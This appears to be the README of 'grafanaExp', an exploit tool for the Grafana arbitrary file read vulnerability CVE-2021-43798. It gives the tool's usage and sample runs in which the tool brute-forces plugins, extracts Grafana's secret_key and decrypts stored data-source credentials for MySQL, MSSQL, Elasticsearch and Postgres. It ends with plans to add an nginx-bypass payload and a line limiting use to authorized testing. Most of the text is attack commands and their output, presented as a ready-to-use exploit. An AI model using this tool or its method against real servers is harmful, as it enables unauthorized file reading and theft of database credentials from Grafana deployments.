A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins / extract secret_key / decode data_source info automatic.
Automatic exploit with exp
and local decode dbfile with decode
➜ ./grafanaExp -h
grafanaExp - Exploit Grafana with CVE-2021-43798 Arbitrary File Read.
grafanaExp [global options] command [command options] [arguments...]
exp -u [url] -p [plugin] -c [config] -d [db] -k [key]
decode -f [dbfile] -k [key]
help, h Shows a list of commands or help for one command
--help, -h show help (default: false)
burst plugins / extract secret_key / decode data_source
info automatic.
➜ ./grafanaExp exp -u http://localhost:3000/
2021/12/07 22:19:10 Target vulnerable has plugin [alertlist]
2021/12/07 22:19:10 Get secret_key [SW2YcwTIb9zpOOhoPsMm]
2021/12/07 22:19:10 type:[mysql] name:[MySQL_01] url:[test.mysql.io:3306] user:[root] password[rootpassword] database:[test_dbname] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 type:[mssql] name:[Mssql_01] url:[test_sqlserver:1433] user:[admin] password[adminpassword] database:[db_sqlserver] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 type:[elasticsearch] name:[es_01] url:[http://localhost:9200] user:[] password[] database:[] basic_auth_user:[basic_user] basic_auth_password:[basic_pass]
2021/12/07 22:19:10 type:[postgres] name:[Postgre_01] url:[Postgre_01:5432] user:[pppp] password[sssswwwww] database:[postgredb] basic_auth_user:[] basic_auth_password:[]
2021/12/07 22:19:10 All Done, have nice day!
Local db file decode.
➜ ./grafanaExp decode -f grafana.db -k SW2YcwTIb9zpOOhoPsMm
2021/12/07 23:00:20 type:[mysql] name:[MySQL_01] url:[test.mysql.io:3306] user:[root] password[rootpassword] database:[test_dbname] basic_auth_user:[] basic_auth_password:[]
2021/12/07 23:00:20 type:[mssql] name:[Mssql_01] url:[test_sqlserver:1433] user:[admin] password[adminpassword] database:[db_sqlserver] basic_auth_user:[] basic_auth_password:[]
2021/12/07 23:00:20 type:[elasticsearch] name:[es_01] url:[http://localhost:9200] user:[] password[] database:[] basic_auth_user:[basic_user] basic_auth_password:[basic_pass]
2021/12/07 23:00:20 type:[postgres] name:[Postgre_01] url:[Postgre_01:5432] user:[pppp] password[sssswwwww] database:[postgredb] basic_auth_user:[] basic_auth_password:[]
1、support https
2、add darwin binary
3、add payload so that it can bypass nginx
This program should only be used for authorized security testing and research purposes.